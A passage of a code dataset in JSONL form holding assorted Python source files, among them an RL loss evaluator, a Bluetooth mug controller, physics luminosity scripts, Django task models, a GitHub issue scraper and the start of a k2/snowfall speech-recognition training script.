+{"seq_id":"46799818","text":"#!/usr/bin/env python3\n\n\nimport numpy as np\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Evaluator(object):\n\n def __init__(self, trainer, discount_factor):\n self._trainer = trainer\n self._discount_factor = discount_factor\n self.mc_loss = []\n self.td_loss = []\n\n def report(self, episode_values, predictions, td_loss):\n mc_loss = float(np.mean(np.abs(episode_values - predictions)))\n td_loss_mean = float(np.mean(td_loss))\n self.mc_loss.append(mc_loss)\n self.td_loss.append(td_loss_mean)\n logger.info(\"MC LOSS: {0:.3f} TD LOSS: {1:.3f}\".format(mc_loss, td_loss_mean))\n\n def get_recent_td_loss(self):\n begin = max(0, len(self.td_loss) - 100)\n return np.mean(np.array(self.td_loss[begin:]))\n\n def get_recent_mc_loss(self):\n begin = max(0, len(self.mc_loss) - 100)\n return np.mean(np.array(self.mc_loss[begin:]))\n","sub_path":"ml/rl/training/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"356004436","text":"import asyncio\nfrom sys import platform\nimport logging\nfrom bleak import BleakClient, BleakScanner\n\nUUIDS = {\n \"target_temp\": \"fc540003-236c-4c94-8fa9-944a3e5353fa\",\n \"led_color\": \"fc540014-236c-4c94-8fa9-944a3e5353fa\",\n \"current_temp\": \"fc540002-236c-4c94-8fa9-944a3e5353fa\",\n \"current_bat\": \"fc540007-236c-4c94-8fa9-944a3e5353fa\",\n}\n\nlogging.basicConfig(format=\"%(asctime)s %(message)s \", level=logging.INFO)\n\n\nclass Mug:\n def __init__(self, unit: str, coffeeTemp=5500, teaTemp=5900):\n self.unit = unit\n self.coffeeTemp = coffeeTemp\n self.teaTemp = teaTemp\n self.keepConnectionAlive = True\n self.searchForDevice = True\n self.current_temp = None\n\n async def connectToMug(self):\n try:\n print(\"Searching..\", end=\"\")\n # self.connectionChanged.emit(False)\n # Search for the mug as long til we find it.\n while self.searchForDevice:\n print(\".\", end=\"\")\n scanner = BleakScanner()\n # scanner.register_detection_callback(detection_callback)\n await scanner.start()\n await asyncio.sleep(5.0)\n await scanner.stop()\n devices = await scanner.get_discovered_devices()\n for device in devices:\n if device.name == \"Ember Ceramic Mug\":\n # We found the ember mug!\n print(device.address)\n print(device.name)\n print(device.details)\n # try to connect to the mug\n async with BleakClient(device) as client:\n self.connectedClient = client\n self.isConnected = await client.is_connected()\n print(\"Connected: {0}\".format(self.isConnected))\n if platform != \"darwin\":\n # Avoid this on mac, since CoreBluetooth doesnt support pairing.\n y = await client.pair()\n print(\"Paired: {0}\".format(y))\n # Set connection parameters and use signal to send it to the UI.\n self.keepConnectionAlive = True\n # self.connectionChanged.emit(True)\n # await self.fetchLEDColor(self)\n # Auto update Temp and Battery\n # self.timer = QTimer()\n\n # Execute function every 3 seconds\n # TO-DO: Must decouple the calling of this function from the connection\n # while self.keepConnectionAlive:\n # We stay in here to keep the client alive\n # once keepConnectionAlive is set to false\n # the client will also disconnect automatically\n while self.keepConnectionAlive == True:\n await asyncio.sleep(1)\n # await asyncio.sleep(5)\n # print(\".\")\n # await asyncio.gather(\n # self.getCurrentBattery(),\n # self.getCurrentTemp(),\n # self.getTargetTemp(),\n # )\n # await asyncio.sleep(3)\n return\n except Exception as exc:\n # self.connectionChanged.emit(False)\n print(\"Error: {}\".format(exc))\n\n # # function to get the current temp from the async loop.\n # def fetchCurrentTemperature(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentTemp())\n\n # # function to get the current charge percentage from the async loop.\n # def fetchCurrentBattery(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentBattery())\n\n # Get the current temp\n async def getCurrentTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"current_temp\"]\n )\n CurrentDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n # Unit conversion\n if self.unit == \"F\":\n CurrentDegree = (CurrentDegree * 1.8) + 32\n CurrentDegree = round(CurrentDegree, 1)\n self.current_temp = CurrentDegree\n logging.info(\"Temp: %s\", self.current_temp)\n # await asyncio.sleep(3)\n # print(CurrentDegree)\n # Send UI Signal\n # self.getDegree.emit(float(CurrentDegree))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getCurrentBattery(self):\n if await self.connectedClient.is_connected():\n currentBat = await self.connectedClient.read_gatt_char(UUIDS[\"current_bat\"])\n logging.info(\"Battery: %s\", float(currentBat[0]))\n # await asyncio.sleep(3)\n # Send UI Signal\n # self.getBattery.emit(float(currentBat[0]))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getTargetTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"target_temp\"]\n )\n TargetDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n if self.unit == \"F\":\n TargetDegree = (TargetDegree * 1.8) + 32\n TargetDegree = round(TargetDegree, 1)\n logging.info(\"Temp: %s\", TargetDegree)\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def update_values(self):\n while True:\n try:\n await self.getCurrentBattery()\n await self.getCurrentTemp()\n await self.getTargetTemp()\n await asyncio.sleep(3)\n except:\n print(\"Not connected, trying again in 10 seconds\")\n await asyncio.sleep(10)\n\n async def setToTemp(self, temp: float):\n while True:\n try:\n print(\"Trying\")\n if await self.connectedClient.is_connected():\n if self.unit == \"F\":\n temp = (temp - 32) / 1.8\n print(temp)\n print(\"try setting the target temperature\")\n convert_temp = int(temp * 1000)\n print(convert_temp)\n newtarget = bytearray(convert_temp.to_bytes(2, \"little\"))\n await self.connectedClient.write_gatt_char(\n UUIDS[\"target_temp\"], newtarget, False\n )\n return\n # Send UI Signal\n # self.getDegree.emit(float(temp * 0.01))\n\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n except Exception as err:\n print(\"sleep\")\n print(err)\n await asyncio.sleep(5)\n","sub_path":"mug/mug.py","file_name":"mug.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"483883424","text":"\"\"\"\nAPP-Q2:\n\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\n \nimport graph_degree_dist as dist\n\ndef make_er_graph(num_nodes, prob):\n\ter_graph = dict()\n\tnodes = set([i for i in xrange(num_nodes)])\n\tfor src in xrange(num_nodes):\n\t\ter_graph[src] = []\n\t\tdest_candidates = set(nodes)\n\t\tdest_candidates.remove(src)\n\t\tfor dest in dest_candidates:\n\t\t\tif random.random() < prob:\n\t\t\t\ter_graph[src].append(dest)\n\treturn er_graph\n\ner_graph = make_er_graph(1000, 0.05)\nin_degree_dist = dist.in_degree_distribution(er_graph)\ndist.plot_dist(in_degree_dist, 'bo',\n\t'In-degree (log scale)',\n\t'Probability (log scale)',\n\t'In-degree distribution of ER directed graph')","sub_path":"week1/app/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"465312776","text":"\"\"\"\nproblem_010\n\n조합을 나타내는 식을 함수로 만들어보세요.\n\n팩토리얼 함수를 이용하여도 좋습니다.\n\"\"\"\n\ndef my_combination(a,b):\n \n if a < b:\n return False\n \n a_b = a - b\n \n for a_i in range(1, a):\n a *= a_i\n for b_i in range(1, b):\n b *= b_i\n for ab_i in range(1, a_b):\n a_b *= ab_i\n\n return int(a / (a_b * b))\n\nprint(my_combination(5,3))","sub_path":"algorithm/stud_group/problem_010.py","file_name":"problem_010.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"105209892","text":"import sys\nfrom collections import defaultdict\nfrom ROOT import TGraph, TVectorF, TCanvas, TH1F, kRed\nfrom JMTucker.Tools.ROOTTools import *\nfrom itertools import izip\nimport random\nfrom FWCore.PythonUtilities import LumiList\n\nheader = ['Run:Fill', 'LS', 'UTCTime', 'Beam Status', 'E(GeV)', 'Del(/nb)', 'Rec(/nb)', 'avgPU']\nps = plot_saver('plots_lumibyls_V3', size=(600,600))\n\ninfo = ()\n\ni = 0\n\nthis_fill = 0\nthis_run = 0\nthis_fill_rec = []\nthis_fill_apu = []\nthis_run_pos = []\n\nlumis = []\npileups = []\ntimes = []\nfill = 0\n\nsum_luminosity = 0\nsum_luminosity2 = 0\nmax_ls = 167.147\nrandom.seed()\n\nlluminosity = []\nlpileup = []\nllumisec = []\nlrun = []\n\n# All\nh_pileup = TH1F(\"h_pileup\",\"h_pileup\",100,0,50)\nh_w_pileup = TH1F(\"h_w_pileup\",\"h_w_pileup\",100,0,50)\nh_w_pileup.Sumw2()\n\nh_luminosity = TH1F(\"h_luminosity\",\"h_luminosity\",200,0,170)\nh_w_luminosity = TH1F(\"h_w_luminosity\",\"h_w_luminosity\",200,0,170)\nh_w_luminosity.Sumw2()\n\n# Random Pick\nh_pileup_picked = TH1F(\"h_pileup_picked\",\"h_pileup_picked\",100,0,50)\nh_w_pileup_picked = TH1F(\"h_w_pileup_picked\",\"h_w_pileup_picked\",100,0,50)\nh_w_pileup_picked.Sumw2()\n\n# Shaped distribution\nh_shaped_pileup = TH1F(\"h_shaped_pileup\",\"h_shaped_pileup\",100,0,50)\nh_w_shaped_pileup = TH1F(\"h_w_shaped_pileup\",\"h_w_shaped_pileup\",100,0,50)\nh_w_shaped_pileup.Sumw2()\n\nh_shaped_luminosity = TH1F(\"h_shaped_luminosity\",\"h_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity = TH1F(\"h_w_shaped_luminosity\",\"h_w_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity.Sumw2()\n\nfor line in open(sys.argv[1]):\n line = line.split('|')\n #print len(line), line\n if len(line) != 10:\n continue\n line = [x.strip() for x in line if x.strip()]\n\n run_fill, ls, time, status, energy, delivered, recorded, avgpu = line\n \n if fill != \"Fill\":\n fill_m1 = int(fill)\n \n try:\n run, fill = run_fill.split(':')\n run = int(run)\n fill = int(fill)\n ls = int(ls.split(':')[0])\n recorded = float(recorded)\n avgpu = float(avgpu)\n except ValueError:\n assert line == header\n continue\n \n #print '%i,%i,%i,%s,%g,%g' % (i,fill,run,time,recorded,avgpu)\n\n #print \"lumi=\",ls,\" pileup=\",avgpu\n \n assert fill >= this_fill\n assert run >= this_run\n\n# if avgpu < 4:\n # print \"Fill with small pileup=\",fill\n # print \"Run with small pileup=\",run\n\n lluminosity.append(recorded)\n lpileup.append(avgpu)\n llumisec.append(ls)\n lrun.append(run)\n \n if fill_m1 != fill:\n i = 0\n Luminosity = TVectorF(221878)\n Pileup = TVectorF(221878)\n Time = TVectorF(221878)\n lumis.append(Luminosity)\n pileups.append(Pileup)\n times.append(Time)\n\n #print i,fill_m1,fill\n \n Luminosity[i] = recorded\n Pileup[i] = avgpu\n zeit = time.split(\" \")[1] # FIX TIME\n Zeit = int(int(zeit.split(\":\")[0])*3600+int(zeit.split(\":\")[1])*60+int(zeit.split(\":\")[2]))\n Time[i] = Zeit\n i += 1\n\nfor rec,pu in izip(lluminosity,lpileup):\n h_pileup.Fill(pu)\n h_luminosity.Fill(rec)\n h_w_pileup.Fill(pu,rec)\n\nlumi_list = LumiList.LumiList('Cert_190456-208686_8TeV_22Jan2013ReReco_Collisions12_JSON.txt')\nreduced_lumi_list = LumiList.LumiList()\n\nwhile sum_luminosity2 < 1000000.:\n x = random.randint(0,221878)\n sum_luminosity2 += lluminosity[x]\n h_pileup_picked.Fill(lpileup[x])\n h_w_pileup_picked.Fill(lpileup[x],lluminosity[x])\n if lumi_list.contains(lrun[x],llumisec[x]):\n reduced_lumi_list = reduced_lumi_list + LumiList.LumiList('',[[lrun[x],llumisec[x]]])\n\nreduced_lumi_list.writeJSON('picked_data_JSON.txt')\n \n \nh_pileup.DrawNormalized()\nh_pileup_picked.SetLineColor(kRed)\nh_pileup_picked.DrawNormalized()\nh_pileup.DrawNormalized(\"same\")\nps.save(\"h_pileup_norm\")\n\nh_w_pileup_picked.SetLineColor(kRed)\nh_w_pileup_picked.DrawNormalized()\nh_w_pileup.DrawNormalized(\"same\")\nps.save(\"h_w_pileup_norm\")\n\n \n#count=0\n#print \"How many fills? \",len(lumis),len(pileups),len(times)\n#for i,j,k in izip(lumis,pileups,times):\n# h1=TGraph(k,i)\n# h1.Draw(\"AP\")\n# ps.save(\"Lumi\"+str(count))\n# h2=TGraph(k,j)\n# h2.Draw(\"AP\")\n# ps.save(\"Pileup\"+str(count))\n# count +=1\n\n","sub_path":"MFVNeutralino/test/lumibyls.py","file_name":"lumibyls.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"149523948","text":"# Behnam Asadi \n# http://ros-developer.com\n# To see the function that we are working on visit:\n# http://ros-developer.com/2017/05/07/gradient-descent-method-for-finding-the-minimum/\n# or simply put the following latex code in a latex doc:\n# $$ z= -( 4 \\times e^{- ( (x-4)^2 +(y-4)^2 ) }+ 2 \\times e^{- ( (x-2)^2 +(y-2)^2 ) } )$$\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n\ndef objective_function(x,y):\n z=-( 4*np.exp(-(x-4)**2 - (y-4)**2)+2*np.exp(-(x-2)**2 - (y-2)**2) )\n return z\n\n\ndef f_prim(x,y):\n f_x=-( (-2)*(x-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(x-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n f_y=-( (-2)*(y-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(y-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n return [f_x,f_y]\n\n \nx = np.linspace(-2,10,200)\ny = np.linspace(-2,10,200)\n\nX, Y = np.meshgrid(x,y)\n\nZ=objective_function(X,Y)\n\n\n#Make a 3D plot\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(X, Y, Z,linewidth=0,cmap='coolwarm')\n\nax.set_xlabel('X axis')\nax.set_ylabel('Y axis')\nax.set_zlabel('Z axis')\n\n\nX_old=-2\nY_old=0\n\n\n# The starts point for the algorithm:\nX_new=4\nY_new=2.2\n\n# step size\nepsilon=0.1\n\n# stop criteria\nprecision = 0.00001\n\n\n\nx_path_to_max=[]\ny_path_to_max=[]\nz_path_to_max=[]\n\n\n\nwhile np.sqrt( (X_new-X_old)**2 + (Y_new-Y_old)**2 ) > precision:\n X_old=X_new\n Y_old=Y_new\n \n #[X_new,Y_new]=f_prim(X_new,Y_new)\n #print f_prim(X_new,Y_new)\n x_path_to_max.append(X_new )\n y_path_to_max.append(Y_new )\n z=objective_function(X_new,Y_new)\n z_path_to_max.append(z)\n \n ret_val=f_prim(X_old,Y_old)\n X_new=X_old-epsilon*ret_val[0]\n Y_new=Y_old-epsilon*ret_val[1]\n# print X_new\n# print Y_new\n \n \n\nline1=plt.plot(x_path_to_max,y_path_to_max,z_path_to_max)\nplt.setp(line1,color='g',linewidth=0.5)\n\n\n#print X_new\n#print Y_new\nplt.show()\n\n\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Extra_hw/Extra_hw02/gradDescent/grad_desc9.py","file_name":"grad_desc9.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"240655038","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.utils.http import urlquote\nfrom django.utils.timesince import timesince, timeuntil\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models import Slugged, base_concrete_model, DateStamp\n\nfrom projects.models import Project\nimport reversion\n\ndef get_sentinel_category():\n return TaskCategory.objects.get_or_create(title='Deleted')[0]\n\nclass Task(Slugged):\n project = models.ForeignKey(Project)\n category = models.ForeignKey('TaskCategory', blank=True, null=True,\n on_delete=models.SET(get_sentinel_category))\n projected_completion_date = models.DateField(_(\"Projected Completion Date\"),\n blank=True, null=True)\n completion_date = models.DateField(_(\"Actual Completion Date\"),\n blank=True, null=True)\n description = models.TextField(blank=True)\n expense = models.IntegerField(blank=True)\n price = models.IntegerField(blank=True, verbose_name=_('Markup'))\n\n class Meta:\n order_with_respect_to = 'project'\n\n def save(self, *args, **kwargs):\n if not self.category:\n self.category = get_sentinel_category()\n super(Task, self).save(*args, **kwargs)\n\n\n def get_absolute_url(self):\n return reverse('tasks:task-detail', kwargs={'pk': self.pk})\n\n def get_update_url(self):\n return reverse('tasks:task-update', kwargs={'pk': self.pk})\n\n def due_date_until(self):\n if self.projected_completion_date:\n return timeuntil(self.projected_completion_date)\n\n def due_date_since(self):\n if self.projected_completion_date:\n return timesince(self.projected_completion_date)\n\n def get_status(self):\n if self.project.start_time:\n if self.completion_date:\n result = 2\n else:\n result = 1\n else:\n result = 0\n return result\n\n def get_project_category_totals(self):\n result_dict = {}\n all_categories = TaskCategory.objects.all()\n all_tasks = Task.objects.filter(project=self.project)\n all_categories = all_categories.order_by('order')\n for cat in all_categories:\n cat_tasks = all_tasks.filter(category=cat)\n if cat_tasks:\n cat_exp_total = sum(cat_tasks.values_list('expense', flat=True))\n cat_price_total = sum(cat_tasks.values_list('price', flat=True))\n result_dict[cat.slug] = {\n 'id': cat.id,\n 'title': cat.title,\n 'expense': cat_exp_total,\n 'price': cat_price_total,\n 'total': sum([cat_exp_total, cat_price_total]),\n 'tasks': cat_tasks\n }\n return result_dict\n\n due_date_since.short_description = _(\"Late by\")\n due_date_until.short_description = _(\"Due in\")\nreversion.register(Task)\n\n\nclass TaskCategory(Slugged):\n parent = models.ForeignKey(\"TaskCategory\", blank=True, null=True,\n related_name=\"children\", on_delete=models.SET_NULL)\n ascendants = models.CharField(editable=False, max_length=100, null=True)\n order = models.IntegerField(blank=True, null=True)\n description = models.TextField(blank=True)\n\n class Meta:\n ordering = ('_order', 'order', 'ascendants')\n order_with_respect_to = 'parent'\n\n def save(self, *args, **kwargs):\n\n if self.parent is None:\n self._order = self.order\n\n if self.ascendants:\n if not self.id in [int(ascendant) for ascendant in self.ascendants.split(',')[:-1]]:\n if self.update_descendants():\n super(TaskCategory, self).save(*args, **kwargs)\n else:\n #print 'error: self id in ascendants'\n pass\n else:\n super(TaskCategory, self).save(*args, **kwargs)\n self.update_descendants()\n\n def update_descendants(self):\n current_ascendants = self.ascendants\n #print 'current: ' + str(current_ascendants)\n\n ascendants = [str(self.id)]\n parent = self.parent\n while parent is not None and parent is not self:\n ascendants.insert(0, str(parent.id))\n if parent.parent:\n parent = parent.parent\n else:\n #the while condition will set parent to None and we cant validate it so we end the loop before this\n #while the parent is not None\n break\n if parent == self:\n break\n\n if parent != self or parent is None:\n #print 'parent safe'\n ascendants = \",\".join(ascendants)\n self.ascendants = ascendants\n\n if ascendants != current_ascendants or ascendants is None:\n super(TaskCategory, self).save(update_fields=['ascendants'])\n #print 'new : ' + str(self.ascendants)\n\n children = self.children.all()\n if children:\n for child in children:\n child.update_descendants()\n return True\n else:\n return False\n\n\n def get_update_url(self):\n return reverse('tasks:task-category-update', kwargs={'pk': self.pk})\n\n def get_project_category_price(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.price\n return total\n\n def get_project_category_expense(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.expense\n return total\n\nreversion.register(TaskCategory, follow=['task_set'], exclude=[\"created, modified\"])\n\n\nclass CategoryBundle(Slugged):\n categories = models.ManyToManyField(TaskCategory, null=True, blank=True, related_name='bundles')\n\n def get_update_url(self):\n return reverse('tasks:bundle-update', kwargs={'pk': self.pk})\n","sub_path":"cpm/tasks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"94830120","text":"\nimport unittest\nimport numpy as np\n\nfrom use_generator import Generator\nfrom template import Template\nfrom molecules import Water, Atom, Property, Molecule, Rotator\n\nclass WaterTest( unittest.TestCase ):\n\n def setUp(self):\n self.ut_alpha = np.random.random( (6, ) )\n self.ut_beat = np.random.random( (10, ) )\n\n self.g = Generator()\n self.w = self.g.get_mol( center = np.random.uniform( -10, 10, [3] ), mol = \"water\" )\n\n self.t1 = np.random.uniform( 0, np.pi/2 )\n self.t2 = np.random.uniform( 0, np.pi )\n self.t3 = np.random.uniform( 0, np.pi/2 )\n\n\n def test_negative_y_get_euler(self):\n\n w = self.g.get_mol( center = [0,0,0], mol = \"water\" )\n\n t1 = 0\n t2 = 0\n t3 = 0\n\n t1 = np.pi/2\n #t2 = np.pi/2\n #t3 = np.pi/2\n\n #t1, t2, t3 = w.get_euler()\n Rz1 = Rotator.get_Rz( t1 )\n #Ry = Molecule.get_Ry_inv( t2 )\n #Rz2 = Molecule.get_Rz( t3 )\n\n\n\n #assert isinstance( w, )\n\n\n\n def eq(self, a, b):\n np.testing.assert_almost_equal( a, b, decimal = 3)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/test/test_operators.py","file_name":"test_operators.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"127724362","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-i386/egg/silme/io/sqlite.py\n# Compiled at: 2010-06-12 17:55:55\nimport silme.io\nfrom silme.io.clients import IOClient, DBClient\nfrom silme.core import L10nPackage, L10nObject, EntityList, Object, Entity\nimport os\nfrom pysqlite2 import dbapi2 as sqlite\n\ndef register(Manager):\n Manager.register(SQLiteClient)\n\n\nclass SQLiteClient(DBClient):\n name = 'sqlite'\n desc = 'SQLite reader/writer'\n type = IOClient.__name__\n\n @classmethod\n def matches_path(cls, path):\n \"\"\"\n tests if the ioclient should be used for this type of path\n Matches any sqlite:\n \"\"\"\n return path.startswith('sqlite:')\n\n @classmethod\n def get_entitylist(cls, path, source=False, code='default', parser=None):\n entityList = EntityList()\n (path, table) = cls._explode_path(path)\n con = cls._connected()\n if not con:\n cls._connect(path)\n cursor = cls.connection.cursor()\n cursor.execute('SELECT * FROM ' + table)\n for row in cursor:\n entitylist.add_entity(Entity(row[0], row[1]))\n\n cursor.close()\n if not con:\n cls._close()\n return entitylist\n\n @classmethod\n def get_l10npackage(cls, path, load_objects=True):\n l10npackage = L10nPackage()\n cls._connect(path)\n l10npackage.id = os.path.basename(path)\n l10npackage.objects['L10nTable'] = L10nObject(cls.build_entitylist(path, 'L10nTable'))\n cls._close()\n return l10npackage\n\n @classmethod\n def _explode_path(cls, path):\n return (\n path, 'l10n')\n\n @classmethod\n def _connect(cls, path):\n cls.connection = sqlite.connect(path)\n\n def _close(cls):\n if cls._connected():\n cls.connection.close()\n cls.connection = None\n return\n\n def _connected():\n return bool(cls.connection)","sub_path":"pycfiles/silme-0.8.1-py2.5/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"451389628","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nlist_sites = []\nnum = 58\n\nfor i in range(1, num):\n url = 'https://github.com/reek/anti-adblock-killer/issues?page=' + str(i) + '&q=is%3Aissue+is%3Aopen'\n with urllib.request.urlopen(url) as response:\n html = response.read()\n soup = BeautifulSoup(html, 'html.parser')\n #pretty_html = soup.prettify()\n #with open(str(i) + '.hmtl', 'w') as f:\n # f.write(pretty_html)\n all_links = soup.find_all(\"a\", class_=\"link-gray-dark no-underline h4 js-navigation-open\")\n for link in all_links:\n site = link.string.rstrip().lstrip()\n if site:\n #print(site)\n list_sites.append(site)\nprint(len(list_sites))\n\nwith open('reek.txt', 'w') as f:\n for site in list_sites:\n f.write(site + '\\n')\n","sub_path":"Code/reek_issues.py","file_name":"reek_issues.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"265085652","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2020 Xiaomi Corporation (authors: Daniel Povey\n# Haowen Qiu\n# Fangjun Kuang)\n# 2021 University of Chinese Academy of Sciences (author: Han Zhu)\n# Apache 2.0\n\nimport argparse\nimport logging\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Dict, Optional\n\nimport k2\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch import nn\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.nn.utils import clip_grad_value_\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom lhotse.utils import fix_random_seed, nullcontext\nfrom snowfall.common import describe, str2bool\nfrom snowfall.common import load_checkpoint, save_checkpoint\nfrom snowfall.common import save_training_info\nfrom snowfall.common import setup_logger\nfrom snowfall.data.librispeech import LibriSpeechAsrDataModule\nfrom snowfall.dist import cleanup_dist\nfrom snowfall.dist import setup_dist\nfrom snowfall.lexicon import Lexicon\nfrom snowfall.models import AcousticModel\nfrom snowfall.models.conformer import Conformer\nfrom snowfall.models.contextnet import ContextNet\nfrom snowfall.models.tdnn_lstm import TdnnLstm1b # alignment model\nfrom snowfall.models.transformer import Noam, Transformer\nfrom snowfall.objectives import LFMMILoss, encode_supervisions\nfrom snowfall.training.diagnostics import measure_gradient_norms, optim_step_and_measure_param_change\nfrom snowfall.training.mmi_graph import MmiTrainingGraphCompiler\nfrom snowfall.training.mmi_graph import create_bigram_phone_lm\n\n\ndef get_objf(batch: Dict,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n is_training: bool,\n is_update: bool,\n accum_grad: int = 1,\n den_scale: float = 1.0,\n att_rate: float = 0.0,\n tb_writer: Optional[SummaryWriter] = None,\n global_batch_idx_train: Optional[int] = None,\n optimizer: Optional[torch.optim.Optimizer] = None,\n scaler: GradScaler = None\n ):\n feature = batch['inputs']\n # at entry, feature is [N, T, C]\n feature = feature.permute(0, 2, 1) # now feature is [N, C, T]\n assert feature.ndim == 3\n feature = feature.to(device)\n\n supervisions = batch['supervisions']\n supervision_segments, texts = encode_supervisions(supervisions)\n\n loss_fn = LFMMILoss(\n graph_compiler=graph_compiler,\n P=P,\n den_scale=den_scale,\n use_pruned_intersect=use_pruned_intersect\n )\n\n grad_context = nullcontext if is_training else torch.no_grad\n\n with autocast(enabled=scaler.is_enabled()), grad_context():\n\n if att_rate == 0:\n # Note: Make TorchScript happy by making the supervision dict strictly\n # conform to type Dict[str, Tensor]\n # Using the attention decoder with TorchScript is currently unsupported,\n # we'll need to separate out the 'text' field from 'supervisions' first.\n del supervisions['text']\n\n nnet_output, encoder_memory, memory_mask = model(feature, supervisions)\n if att_rate != 0.0:\n att_loss = model.module.decoder_forward(encoder_memory, memory_mask, supervisions, graph_compiler)\n\n if (ali_model is not None and global_batch_idx_train is not None and\n global_batch_idx_train // accum_grad < 4000):\n with torch.no_grad():\n ali_model_output = ali_model(feature)\n # subsampling is done slightly differently, may be small length\n # differences.\n min_len = min(ali_model_output.shape[2], nnet_output.shape[2])\n # scale less than one so it will be encouraged\n # to mimic ali_model's output\n ali_model_scale = 500.0 / (global_batch_idx_train // accum_grad + 500)\n nnet_output = nnet_output.clone() # or log-softmax backprop will fail.\n nnet_output[:, :,:min_len] += ali_model_scale * ali_model_output[:, :,:min_len]\n\n # nnet_output is [N, C, T]\n nnet_output = nnet_output.permute(0, 2, 1) # now nnet_output is [N, T, C]\n\n mmi_loss, tot_frames, all_frames = loss_fn(nnet_output, texts, supervision_segments)\n\n if is_training:\n def maybe_log_gradients(tag: str):\n if tb_writer is not None and global_batch_idx_train is not None and global_batch_idx_train % 200 == 0:\n tb_writer.add_scalars(\n tag,\n measure_gradient_norms(model, norm='l1'),\n global_step=global_batch_idx_train\n )\n\n if att_rate != 0.0:\n loss = (- (1.0 - att_rate) * mmi_loss + att_rate * att_loss) / (len(texts) * accum_grad)\n else:\n loss = (-mmi_loss) / (len(texts) * accum_grad)\n scaler.scale(loss).backward()\n if is_update:\n maybe_log_gradients('train/grad_norms')\n scaler.unscale_(optimizer)\n clip_grad_value_(model.parameters(), 5.0)\n maybe_log_gradients('train/clipped_grad_norms')\n if tb_writer is not None and (global_batch_idx_train // accum_grad) % 200 == 0:\n # Once in a time we will perform a more costly diagnostic\n # to check the relative parameter change per minibatch.\n deltas = optim_step_and_measure_param_change(model, optimizer, scaler)\n tb_writer.add_scalars(\n 'train/relative_param_change_per_minibatch',\n deltas,\n global_step=global_batch_idx_train\n )\n else:\n scaler.step(optimizer)\n optimizer.zero_grad()\n scaler.update()\n\n ans = -mmi_loss.detach().cpu().item(), tot_frames.cpu().item(\n ), all_frames.cpu().item()\n return ans\n\n\ndef get_validation_objf(dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n scaler: GradScaler,\n den_scale: float = 1,\n ):\n total_objf 